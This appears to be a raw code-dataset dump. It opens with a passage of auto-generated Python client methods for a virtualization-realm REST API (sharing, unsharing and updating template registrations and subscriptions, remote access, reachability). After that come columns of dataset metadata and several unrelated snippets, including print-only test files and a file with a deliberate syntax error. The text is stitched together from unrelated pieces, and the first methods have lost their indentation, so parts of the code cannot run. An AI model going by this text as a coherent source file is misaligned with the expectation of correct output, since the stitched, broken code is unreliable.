collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
if 'target_realm_ids' in local_var_params and local_var_params['target_realm_ids'] is not None: # noqa: E501
query_params.append(('target_realm_ids', local_var_params['target_realm_ids'])) # noqa: E501
collection_formats['target_realm_ids'] = 'multi' # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}/share', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unregister_template(self, id, registration_id, input_unregister_template_object, **kwargs): # noqa: E501
"""Delete Template Registration # noqa: E501
Removes an existing Template Registration from the specified Virtualization Realm.<br> <br> Note: Unregistering a Template will remove all subscriptions to the Template from other Virtualization Realms. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_template(id, registration_id, input_unregister_template_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputUnregisterTemplateObject input_unregister_template_object: The deletion settings (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unregister_template_with_http_info(id, registration_id, input_unregister_template_object, **kwargs) # noqa: E501
def unregister_template_with_http_info(self, id, registration_id, input_unregister_template_object, **kwargs): # noqa: E501
"""Delete Template Registration # noqa: E501
Removes an existing Template Registration from the specified Virtualization Realm.<br> <br> Note: Unregistering a Template will remove all subscriptions to the Template from other Virtualization Realms. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unregister_template_with_http_info(id, registration_id, input_unregister_template_object, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param InputUnregisterTemplateObject input_unregister_template_object: The deletion settings (required)
:param _return_http_data_only: response data without head status code
and headers
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'registration_id', 'input_unregister_template_object'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method unregister_template" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in local_var_params or # noqa: E501
local_var_params['id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `id` when calling `unregister_template`") # noqa: E501
# verify the required parameter 'registration_id' is set
if self.api_client.client_side_validation and ('registration_id' not in local_var_params or # noqa: E501
local_var_params['registration_id'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `registration_id` when calling `unregister_template`") # noqa: E501
# verify the required parameter 'input_unregister_template_object' is set
if self.api_client.client_side_validation and ('input_unregister_template_object' not in local_var_params or # noqa: E501
local_var_params['input_unregister_template_object'] is None): # noqa: E501
raise ApiValueError("Missing the required parameter `input_unregister_template_object` when calling `unregister_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
if 'registration_id' in local_var_params:
path_params['registration_id'] = local_var_params['registration_id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'input_unregister_template_object' in local_var_params:
body_params = local_var_params['input_unregister_template_object']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json', 'application/xml']) # noqa: E501
# Authentication setting
auth_settings = ['APIKeyHeader', 'Username'] # noqa: E501
return self.api_client.call_api(
'/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='bool', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def unshare_template_registration(self, id, registration_id, target_realm_id, **kwargs): # noqa: E501
"""Unshare Template # noqa: E501
Revokes access to a Template Registration in the specified Virtualization Realm by the provided external Virtualization Realm. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.unshare_template_registration(id, registration_id, target_realm_id, async_req=True)
>>> result = thread.get()
:param async_req bool: execute request asynchronously
:param int id: ID of virtualization realm (required)
:param int registration_id: ID of template registration (required)
:param int target_realm_id: ID of external virtualization realm to revoke template registration access for (required)
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
:return: bool
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
return self.unshare_template_registration_with_http_info(id, registration_id, target_realm_id, **kwargs) # noqa: E501
def unshare_template_registration_with_http_info(self, id, registration_id, target_realm_id, **kwargs):  # noqa: E501
    """Unshare Template.

    Revokes access to a Template Registration in the specified
    Virtualization Realm by the provided external Virtualization Realm.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int registration_id: ID of template registration (required)
    :param int target_realm_id: ID of external virtualization realm to revoke template registration access for (required)
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positionals plus the standard options.
    all_params = [
        'id', 'registration_id', 'target_realm_id',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method unshare_template_registration" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `unshare_template_registration`")  # noqa: E501
        if local_var_params.get('registration_id') is None:
            raise ApiValueError("Missing the required parameter `registration_id` when calling `unshare_template_registration`")  # noqa: E501
        if local_var_params.get('target_realm_id') is None:
            raise ApiValueError("Missing the required parameter `target_realm_id` when calling `unshare_template_registration`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: {id} and {registration_id}.
    path_params = {}
    for param in ('id', 'registration_id'):
        if param in local_var_params:
            path_params[param] = local_var_params[param]

    # Query string carries the realm whose access is being revoked.
    query_params = []
    if local_var_params.get('target_realm_id') is not None:
        query_params.append(('target_realm_id', local_var_params['target_realm_id']))

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/registrations/{registration_id}/share', 'DELETE',
        path_params,
        query_params,
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_template_registration(self, id, registration_id, input_cons3rt_template_data, **kwargs):  # noqa: E501
    """Update Template Registration.

    Updates the Template Registration for a single Virtualization Realm by
    the given ID. The state of a Template Registration can only be set to
    OFFLINE or PUBLISHED; all fields in the template data are honored on
    update, so provide the full desired configuration.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.update_template_registration(id, registration_id, input_cons3rt_template_data, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int registration_id: ID of template registration (required)
    :param InputCons3rtTemplateData input_cons3rt_template_data: The modified template registration data (required)
    :param bool offline: The desired template registration state
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: bool (or the request thread when async_req is True)
    """
    # Delegate to the *_with_http_info variant, requesting data only.
    kwargs['_return_http_data_only'] = True
    return self.update_template_registration_with_http_info(
        id, registration_id, input_cons3rt_template_data, **kwargs)
def update_template_registration_with_http_info(self, id, registration_id, input_cons3rt_template_data, **kwargs):  # noqa: E501
    """Update Template Registration.

    Updates the Template Registration for a single Virtualization Realm by
    the given ID. The state of a Template Registration can only be set to
    OFFLINE or PUBLISHED; all fields in the template data are honored on
    update, so provide the full desired configuration.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int registration_id: ID of template registration (required)
    :param InputCons3rtTemplateData input_cons3rt_template_data: The modified template registration data (required)
    :param bool offline: The desired template registration state
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positionals plus the standard options.
    all_params = [
        'id', 'registration_id', 'input_cons3rt_template_data', 'offline',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_template_registration" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `update_template_registration`")  # noqa: E501
        if local_var_params.get('registration_id') is None:
            raise ApiValueError("Missing the required parameter `registration_id` when calling `update_template_registration`")  # noqa: E501
        if local_var_params.get('input_cons3rt_template_data') is None:
            raise ApiValueError("Missing the required parameter `input_cons3rt_template_data` when calling `update_template_registration`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: {id} and {registration_id}.
    path_params = {}
    for param in ('id', 'registration_id'):
        if param in local_var_params:
            path_params[param] = local_var_params[param]

    # Optional query flag selecting the desired registration state.
    query_params = []
    if local_var_params.get('offline') is not None:
        query_params.append(('offline', local_var_params['offline']))

    # The modified registration travels in the request body.
    body_params = local_var_params.get('input_cons3rt_template_data')

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json', 'application/xml']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/registrations/{registration_id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_template_subscription(self, id, subscription_id, input_template_subscription, **kwargs):  # noqa: E501
    """Update Template Subscription.

    Updates the Template Subscription for a single Virtualization Realm by
    the given ID. The state of a Template Subscription can only be set to
    OFFLINE or PUBLISHED, and its limits (CPU, RAM, etc.) cannot exceed the
    values in the Registration.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.update_template_subscription(id, subscription_id, input_template_subscription, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int subscription_id: ID of template subscription (required)
    :param InputTemplateSubscription input_template_subscription: The modified template subscription data (required)
    :param bool offline: The desired template subscription state
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: bool (or the request thread when async_req is True)
    """
    # Delegate to the *_with_http_info variant, requesting data only.
    kwargs['_return_http_data_only'] = True
    return self.update_template_subscription_with_http_info(
        id, subscription_id, input_template_subscription, **kwargs)
def update_template_subscription_with_http_info(self, id, subscription_id, input_template_subscription, **kwargs):  # noqa: E501
    """Update Template Subscription.

    Updates the Template Subscription for a single Virtualization Realm by
    the given ID. The state of a Template Subscription can only be set to
    OFFLINE or PUBLISHED, and its limits (CPU, RAM, etc.) cannot exceed the
    values in the Registration.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param int id: ID of virtualization realm (required)
    :param int subscription_id: ID of template subscription (required)
    :param InputTemplateSubscription input_template_subscription: The modified template subscription data (required)
    :param bool offline: The desired template subscription state
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positionals plus the standard options.
    all_params = [
        'id', 'subscription_id', 'input_template_subscription', 'offline',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_template_subscription" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `update_template_subscription`")  # noqa: E501
        if local_var_params.get('subscription_id') is None:
            raise ApiValueError("Missing the required parameter `subscription_id` when calling `update_template_subscription`")  # noqa: E501
        if local_var_params.get('input_template_subscription') is None:
            raise ApiValueError("Missing the required parameter `input_template_subscription` when calling `update_template_subscription`")  # noqa: E501

    collection_formats = {}

    # Path placeholders: {id} and {subscription_id}.
    path_params = {}
    for param in ('id', 'subscription_id'):
        if param in local_var_params:
            path_params[param] = local_var_params[param]

    # Optional query flag selecting the desired subscription state.
    query_params = []
    if local_var_params.get('offline') is not None:
        query_params.append(('offline', local_var_params['offline']))

    # The modified subscription travels in the request body.
    body_params = local_var_params.get('input_template_subscription')

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json', 'application/xml']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/templates/subscriptions/{subscription_id}', 'PUT',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_virt_realm_remote_access_config(self, id, remote_access_config, **kwargs):  # noqa: E501
    """Update Remote Access.

    Updates the Remote Access configuration for a single Virtualization
    Realm by the given ID. Note: remoteAccessIpAddress cannot be updated if
    the Virtualization Realm's Remote Access is currently enabled.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.update_virt_realm_remote_access_config(id, remote_access_config, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param RemoteAccessConfig remote_access_config: The updated remote access configuration (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: bool (or the request thread when async_req is True)
    """
    # Delegate to the *_with_http_info variant, requesting data only.
    kwargs['_return_http_data_only'] = True
    return self.update_virt_realm_remote_access_config_with_http_info(
        id, remote_access_config, **kwargs)
def update_virt_realm_remote_access_config_with_http_info(self, id, remote_access_config, **kwargs):  # noqa: E501
    """Update Remote Access.

    Updates the Remote Access configuration for a single Virtualization
    Realm by the given ID. Note: remoteAccessIpAddress cannot be updated if
    the Virtualization Realm's Remote Access is currently enabled.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param RemoteAccessConfig remote_access_config: The updated remote access configuration (required)
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positionals plus the standard options.
    all_params = [
        'id', 'remote_access_config',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_virt_realm_remote_access_config" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of required parameters.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `update_virt_realm_remote_access_config`")  # noqa: E501
        if local_var_params.get('remote_access_config') is None:
            raise ApiValueError("Missing the required parameter `remote_access_config` when calling `update_virt_realm_remote_access_config`")  # noqa: E501

    collection_formats = {}

    # Path placeholder: {id}.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']

    # The updated configuration travels in the request body.
    body_params = local_var_params.get('remote_access_config')

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json', 'application/xml']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/remoteaccess', 'PUT',
        path_params,
        [],
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_virtualization_realm(self, id, **kwargs):  # noqa: E501
    """Update Virtualization Realm.

    Updates the content of a single Virtualization Realm with the given ID.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.update_virtualization_realm(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param InputVRAdminVirtualizationRealm input_vr_admin_virtualization_realm: The updated Virtualization Realm data
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: bool (or the request thread when async_req is True)
    """
    # Delegate to the *_with_http_info variant, requesting data only.
    kwargs['_return_http_data_only'] = True
    return self.update_virtualization_realm_with_http_info(id, **kwargs)
def update_virtualization_realm_with_http_info(self, id, **kwargs):  # noqa: E501
    """Update Virtualization Realm.

    Updates the content of a single Virtualization Realm with the given ID.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param InputVRAdminVirtualizationRealm input_vr_admin_virtualization_realm: The updated Virtualization Realm data
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positionals plus the standard options.
    all_params = [
        'id', 'input_vr_admin_virtualization_realm',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_virtualization_realm" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of the required parameter.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `update_virtualization_realm`")  # noqa: E501

    collection_formats = {}

    # Path placeholder: {id}.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']

    # Optional realm payload travels in the request body when supplied.
    body_params = local_var_params.get('input_vr_admin_virtualization_realm')

    header_params = {
        'Accept': self.api_client.select_header_accept(['application/json']),
        'Content-Type': self.api_client.select_header_content_type(
            ['application/json', 'application/xml']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}', 'PUT',
        path_params,
        [],
        header_params,
        body=body_params,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
def update_virtualization_realm_reachability(self, id, **kwargs):  # noqa: E501
    """update_virtualization_realm_reachability.

    Triggers a reachability update for the Virtualization Realm with the
    given ID.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    >>> thread = api.update_virtualization_realm_reachability(id, async_req=True)
    >>> result = thread.get()

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: bool (or the request thread when async_req is True)
    """
    # Delegate to the *_with_http_info variant, requesting data only.
    kwargs['_return_http_data_only'] = True
    return self.update_virtualization_realm_reachability_with_http_info(id, **kwargs)
def update_virtualization_realm_reachability_with_http_info(self, id, **kwargs):  # noqa: E501
    """update_virtualization_realm_reachability.

    Triggers a reachability update for the Virtualization Realm with the
    given ID.

    Synchronous by default; pass ``async_req=True`` for an asynchronous
    request, in which case the request thread is returned.

    :param async_req bool: execute request asynchronously
    :param str id: ID of virtualization realm (required)
    :param _return_http_data_only: response data without head status code and headers
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
    :param _request_timeout: total timeout, or a (connection, read) tuple
    :return: tuple(bool, status_code(int), headers(HTTPHeaderDict))
    """
    local_var_params = locals()

    # Accepted argument names: positional plus the standard options.
    all_params = [
        'id',
        'async_req', '_return_http_data_only',
        '_preload_content', '_request_timeout',
    ]

    # Fold **kwargs into the parameter map, rejecting unknown names.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method update_virtualization_realm_reachability" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation of the required parameter.
    if self.api_client.client_side_validation:
        if local_var_params.get('id') is None:
            raise ApiValueError("Missing the required parameter `id` when calling `update_virtualization_realm_reachability`")  # noqa: E501

    collection_formats = {}

    # Path placeholder: {id}.
    path_params = {}
    if 'id' in local_var_params:
        path_params['id'] = local_var_params['id']

    header_params = {
        'Accept': self.api_client.select_header_accept(
            ['application/json', 'application/xml']),
    }

    return self.api_client.call_api(
        '/api/virtualizationrealms/{id}/updatereachability', 'PUT',
        path_params,
        [],
        header_params,
        body=None,
        post_params=[],
        files={},
        response_type='bool',
        auth_settings=['APIKeyHeader', 'Username'],
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats)
| 51.608977
| 357
| 0.621155
| 26,150
| 231,105
| 5.244245
| 0.015641
| 0.044744
| 0.064111
| 0.024939
| 0.978817
| 0.973421
| 0.966348
| 0.961374
| 0.955876
| 0.946769
| 0
| 0.015286
| 0.306168
| 231,105
| 4,477
| 358
| 51.620505
| 0.839961
| 0.455464
| 0
| 0.801576
| 0
| 0
| 0.205508
| 0.076767
| 0
| 0
| 0
| 0
| 0
| 1
| 0.037912
| false
| 0
| 0.002954
| 0
| 0.078779
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
872700c807715d35595ce054fa6343e49a1b0eb4
| 94
|
py
|
Python
|
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
test.py
|
haohanshi/HackCMU217
|
15df270f4586e3dda76db050060aaae091d34472
|
[
"MIT"
] | null | null | null |
print("this is for test")
print("this is another test")
print("this is another another test")
| 23.5
| 37
| 0.734043
| 16
| 94
| 4.3125
| 0.375
| 0.391304
| 0.478261
| 0.434783
| 0.637681
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.138298
| 94
| 3
| 38
| 31.333333
| 0.851852
| 0
| 0
| 0
| 0
| 0
| 0.680851
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
8752b07671fc52f0ec48195d2ea69dfe1ca0c7ac
| 28
|
py
|
Python
|
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | 4
|
2020-01-19T01:42:06.000Z
|
2021-05-13T09:51:38.000Z
|
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | null | null | null |
test/test_syntax_error.py
|
blockpy-edu/skulpt
|
dc70288aedcd7670605ef28f8525546440b39f93
|
[
"MIT"
] | 4
|
2019-10-16T21:50:53.000Z
|
2021-01-11T06:25:57.000Z
|
a = 0
c = 7
print(4
x = 8
| 4
| 7
| 0.428571
| 8
| 28
| 1.5
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.25
| 0.428571
| 28
| 7
| 8
| 4
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0.25
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
875b6220efbab778abbca1fc4f7148ae4b4495e9
| 49
|
py
|
Python
|
signup/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 12
|
2015-01-12T17:26:32.000Z
|
2020-02-19T19:13:18.000Z
|
signup/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 7
|
2015-01-22T13:09:47.000Z
|
2021-08-22T02:43:06.000Z
|
classphoto/tests/__init__.py
|
p2pu/mechanical-mooc
|
b57ce2e3a61f4fc5fe4b1c485b2a69429933ebcc
|
[
"MIT"
] | 8
|
2015-10-27T22:34:01.000Z
|
2020-04-10T23:15:49.000Z
|
from test_view import *
from test_model import *
| 16.333333
| 24
| 0.795918
| 8
| 49
| 4.625
| 0.625
| 0.432432
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163265
| 49
| 2
| 25
| 24.5
| 0.902439
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
